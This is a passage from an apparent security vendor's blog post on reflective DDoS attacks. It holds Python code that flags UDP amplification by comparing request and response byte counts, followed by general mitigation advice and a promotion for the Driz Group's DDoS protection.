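                     "proto": int(r["proto"]), "bytes": int(r["bytes"]),
                     "packets": int(r["packets"])})
    return rows


def find_amplification(flows, min_ratio=10.0, min_response_bytes=10000):
    """Group UDP flows by (service_ip, service_port, peer_ip). Request bytes
    are peer -> service:port; response bytes are service:port -> peer. Flag
    pairs whose response/request byte ratio reaches min_ratio. A peer that
    sent no request at all (ratio computed against 1 byte) is the classic
    victim-side view of reflection: replies to questions it never asked."""
    req = defaultdict(int)
    resp = defaultdict(int)
    for f in flows:
        if f["proto"] != 17:
            continue  # TCP needs a handshake, so a spoofed source gets no data
        if f["dport"] < 1024:                    # peer -> service: a request
            req[(f["dst"], f["dport"], f["src"])] += f["bytes"]
        if f["sport"] < 1024:                    # service -> peer: a response
            resp[(f["src"], f["sport"], f["dst"])] += f["bytes"]
    findings = []
    for key, rbytes in resp.items():
        if rbytes < min_response_bytes:
            continue                             # ordinary client traffic
        ratio = rbytes / max(req.get(key, 0), 1)
        if ratio >= min_ratio:
            service_ip, port, peer = key
            findings.append({"service": f"{service_ip}:{port}", "victim": peer,
                             "response_bytes": rbytes,
                             "request_bytes": req.get(key, 0),
                             "ratio": round(ratio, 1)})
    return sorted(findings, key=lambda x: -x["ratio"])


if __name__ == "__main__":
    for finding in find_amplification(load_flows(SAMPLE_FLOWS)):
        print(finding)
```

In the constructed data the ordinary DNS exchange (80 bytes out, 200 back) is ignored, while the same DNS server answering 600 bytes of “requests” from 203.0.113.5 with 48,000 bytes, and an NTP server sending that address 40,000 bytes with no request at all, are both reported against the same victim. Thresholds should be tuned per service, since protocols that legitimately return large answers will sit closer to the `min_ratio` line.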
Best Practices Against DDoS Extortions
It’s recommended not to pay ransom to DDoS extortionists. Ransom payment only encourages extortionists to attack your organization again.
Like other types of DDoS attacks, DDoS attacks using reflective techniques exploit two groups: the ultimate target and vulnerable computers, in this case vulnerable UDP servers. To prevent your organization’s computers from being used for reflective DDoS attacks, it’s best to stop using UDP when it is not needed. If UDP is needed, configure the service to always respond with a smaller packet size. It’s also important to use a firewall.
To protect your organization from being the ultimate target of a reflective DDoS attack, it’s best to work with your trusted cybersecurity service provider and use a DDoS protection service to prevent the DDoS traffic from reaching your organization’s systems.
The Driz Group specializes in DDoS protection and can mitigate a DDoS attack in just a few minutes.
Steve E. Driz, I.S.P., ITCP